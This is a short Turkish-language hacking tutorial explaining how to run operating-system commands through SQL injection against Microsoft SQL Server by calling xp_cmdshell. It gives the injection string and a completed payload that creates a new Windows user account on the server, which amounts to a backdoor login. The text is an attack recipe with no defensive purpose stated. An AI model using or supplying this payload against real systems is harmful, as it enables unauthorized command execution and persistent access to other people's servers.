MsSQL Injection ~ CmdShell Çalıştırma

MsSQL Injection yaparken uzaktan cmdshell çalıştırabiliyoruz.Şu komut ile cmdshelli çalıştırabilmekteyiz.

;exec master..xp_cmdshell ’’--

’’ bıraktıgım yer size kalan komutların kullanacagınız yer.

mesela en basitinden ’’ şu kısımın arasına bizim o meşhur MS SQL
password ve user oluşturma komutumuzu kullanabiliriz.

’net user /add Energyzer Energyzer7’

Tamamlayacak olursak

;exec master..xp_cmdshell ’net user / add Energyzer Energyzer7’--